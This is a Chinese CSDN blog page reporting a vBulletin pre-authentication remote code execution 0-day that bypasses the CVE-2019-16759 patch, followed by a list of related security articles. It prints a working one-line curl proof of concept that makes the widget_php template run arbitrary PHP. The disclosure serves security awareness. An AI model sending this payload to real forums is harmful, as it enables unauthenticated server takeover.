vBulletin 0 day漏洞PoC公布

最新推荐文章于 2023-12-30 18:02:20 发布
最新推荐文章于 2023-12-30 18:02:20 发布
阅读量531 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/systemino/article/details/108037852
版权

vBulletin是当前最流行的论坛软件之一。安全研究人员Amir Etemadieh在其中发现了一个0 day漏洞,并公布了漏洞细节和PoC 代码。

该0 day漏洞是CVE-2019-16759 漏洞补丁的绕过。CVE-2019-16759 漏洞是去年9月公布的一个 0 day漏洞。该漏洞是vBulletin模板系统中的漏洞,属于预认证远程代码执行漏洞。攻击者利用该漏洞可以运行恶意代码,并且在无需对受害者网站进行认证的情况下接管论坛。CVE-2019-16759 漏洞细节公布1天后,安全补丁就发布了。

CVE-2019-16759补丁绕过0 day漏洞

研究人员称CVE-2019-16759 漏洞补丁不足以拦截漏洞利用。奇热他还发现了一种简单的方法可以绕过补丁,并利用CVE-2019-16759漏洞。

模板“widget_tabbedcontainer_tab_panel”可以加载用户控制的子模板,可以通过从单独命名的值中取值,并放置到变量“widgetConfig”中。这两个特征使得研究人员可以有效绕过CVE-2019-16759漏洞补丁的所有过滤策略。

PoC代码如下:

curl -s http://EXAMPLE.COM/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();'

除了PoC代码,研究人员还编写了Bash、Python、Ruby等不同语言的漏洞利用

最低0.47元/天 解锁文章
systemino
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试常用poc、工具集合
01-06
poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v1.2.25任意文件上传漏洞 CVE-2019-16132 OKLite v1.2.25存在任意文件删除漏洞 CVE-2019-16309 FlameCMS 3.3.5后台登录处存在sql注入漏洞] CVE-2019-16313蜂网互联企业级路由器v4.31密码泄露漏洞 CVE-2019-16314 indexhibit cms v2.1.5存在重装并导致getshell CVE-2019-16759 vBulletin 5.x Oday pre-auth RCE exploit
CVE-2019-16759 vBulletin 5.x pre-auth rce复现
Sp4rkW的博客
08-11 1293
你可以在以下渠道联系到我,转载请注明文章来源地址~ 中文id:闪光 知乎:Sp4rkW GITHUB:Sp4rkW B站:一只技术君 博客:https://sp4rkw.blog.csdn.net/ 联系邮箱:getf_own@163.com github看到某大佬的演示,还以为是0day,后来发现是去年的洞,不过都复现完成了,就记录写个博客吧 环境搭建 直接拖个docker docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-20
ajax做tab页面切换,(转)37个Ajax和CSS实现的Tab选项卡切换效果界面
weixin_35250656的博客
08-05 590
The Autochanging Tabs1) - You can now set the autochange mode to one of your tab menus.2)3) - Supports "slideshow" mode, in which script automatically cycles through and selects each tab periodically ...
ExtJs的.NET控件----TabContainer和TabPanel
weixin_33795743的博客
10-20 84
     TabContainer通常是与TabPanel控件配合使用的,目前很多控件库以及控件产品里基本都有这两个控件,标准控件里虽然没有,在ASP.NET AJAX里已经提供了这两个控件,用他们可以很方便的来定制选项卡级的开发。但是不同的控件都有他的优点和不足之处。      比如ASP.NET AJAX里的我个人觉得界面效果太难看了,即使使用CSS也不好控制开发的灵活性不够好;如果说看界面...
vBulletin 5.x RCE(CVE-2019-16759 )复现
锋刃科技的博客
08-13 1880
环境搭建 使用docker安装 docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808 docker exec -it e4fce6b1886c /bin/bash # update然后装vim apt-get update apt install vim # 改配置 vim /etc/apache2/apache2.conf# 最下面补这个配置 ServerName localhost:
vbulletin论坛_不同的社区论坛类型:vBulletin vs PhpBB与SMF
culu1614的博客
08-10 1017
vbulletin论坛According to Google definition and Wikipedia vBulletin(vB) is a commercial Internet forum software called vBulletin Solutions. Initially vBulletin was designed as forum script including fea...
漏洞分析|vBulletin反序列化代码执行漏洞(CVE-2023-25135)
最新发布
xuandaoren的博客
12-30 940
利用此原理, 在vBulletin实例化vB_DataManager_User类,调用unserialize()方法检查searchprefs字段是否序列化时候,如果在searchprefs字段内容里面填写的是一个序列化的精心构造的类名,此时unserialize()方法会反序列化该类名的对象,整个过程中会调用到vB:: autoload(),从而引入加载以该类名分解构成的文件。即使这个类名是不真实存在的,它也只会返回一个__PHP_Incomplete_Class的实例,反序列化的过程不会崩溃。
漏洞分析 | vBulletin反序列化代码执行漏洞(CVE-2023-25135)
WangsuSecurity的博客
11-29 240
vBulletin是一个强大、灵活的商业论坛程序(非开源)。在CVE-2023-25135漏洞中,vBulletin 允许未经过验证的远程攻击者通过触发反序列化的HTTP请求执行任意代码。
php strus2 漏洞攻击_CVE-2020-17496 Bulletin 漏洞
weixin_32173041的博客
12-21 370
近日,Unit 42研究人员发现了vBulletin预认证远程代码执行漏洞CVE-2020-17496的在野利用。该漏洞利用是对CVE-2019-16759 漏洞补丁的绕过。由于有超过10万个基于vBulletin的网站,其中包括大企业和组织的论坛,研究人员建议用户尽快修复。 CVE-2020-17496漏洞根源分析模板渲染是vBulletin中的一个功能,可以将XML模板转化为PHP代码并执行。...
开源论坛程序 vBulletin 被曝严重且详情不明的漏洞,请立即修复
smellycat000的专栏
05-12 733
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队如果你正在运行基于vBulletin软件的在线论坛,那么应确保已安装旨在修复严重漏洞的新补丁。。vBulletin 项目...
vBulletin nual模板
12-06
vBulletin nual模板
vBulletin 4.2.2
06-12
vBulletin 是国外知名的商业论坛程序.在国内也是小有名气!此版本为4.0.x以上版本
vBulletin 4.1.5 俄文语言包
06-05
vBulletin 4.1.5 俄文语言包
[论坛社区]vBulletin v3.5.4 Plus! 中国远程先锋修正增强版 Build 060512_vbulletin_
03-15
[论坛社区]vBulletin v3.5.4 Plus! 中国远程先锋修正增强版 Build 060512_vbulletin_[论坛社区]vBulletin v3.5.4 Plus! 中国远程先锋修正增强版 Build 060512_vbulletin_ 1.适合个人搭建网站项目参考 2.适合学生毕业...
初识vbulletin
qq_30007773的博客
01-05 413
1.关于一些简单的变量的输入与输出 1){vb:var variable}输出数组的话就用{va:var variable.foo} 2){vb:raw variable}与{vb:var variable}类似,但是{vb:var variable}是讲HTML标签转义之后的,输出的是文本,不能使用CSS样式,但是安全 PS:普通变量的定义a)在render之前用$templater->r
Apache Solr Velocity模板注入RCE漏洞复现
Ping_Pig的博客
10-31 1427
Solr简介: Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 漏洞概述 近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的S...
vbulletin论坛_评论-vBulletin 3.0
culi4814的博客
07-31 647
vbulletin论坛vBulletin is commonly used to create interactive communities on a huge scale. This PHP-based bulletin board has been employed on some of the most well known Websites, including Linkin Park,...
vBulletin 5.x 前台RCE漏洞复现
cynthrial的博客
11-07 551
vBulletin 5.x 前台RCE漏洞复现vBulletin 5.x 前台RCE漏洞复现漏洞原理RCE复现参考 vBulletin 5.x 前台RCE漏洞复现 漏洞原理 本质是一个文件包含漏洞,攻击者可以通过包含文件执行任意php代码。 追踪源码分析 如果get参数传入则赋值给$path,继续追踪path变量 如果path的变量长度大于2则判断是否是gif等文件,是的话则返回404 执行前检查路径 #strpos取“/”在path中的位置,如果有/ 则函数为真,不继续执行 linux中路径只能为
vbulletin 4 下载
09-22
vBulletin 4 是一款非常受欢迎的论坛软件,在网络上有很多地方可以进行下载。 首先,你可以直接访问vBulletin的官方网站,其网址为https://www.vbulletin.com/。在页面的导航栏上,你可以找到一个名为"Downloads"的选项。点击这个选项后,你会被带到一个页面上,你可以从中下载最新版本的vBulletin 4。 此外,你还可以从一些免费软件下载网站上获取vBulletin 4。这些网站如www.softonic.com、www.download.com等。在这些网站上,你可以使用搜索功能来查找vBulletin 4,然后选择合适的下载链接进行下载。 另外,还有一些支持BT下载的网站也可以提供vBulletin 4的下载资源。你可以使用一些BT下载软件(如BitComet、uTorrent等)来下载vBulletin 4的种子文件,然后开始下载。 无论你选择使用哪种方式进行下载,确保在下载之前,先确认你正在下载的vBulletin 4是正版软件,并且是从可信的来源获取的。这样可以确保软件的安全性和稳定性。 总之,vBulletin 4是一款优秀的论坛软件,你可以通过官方网站、免费软件下载网站或支持BT下载的网站来获取它。记得选择正版软件,并从可信的来源进行下载。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值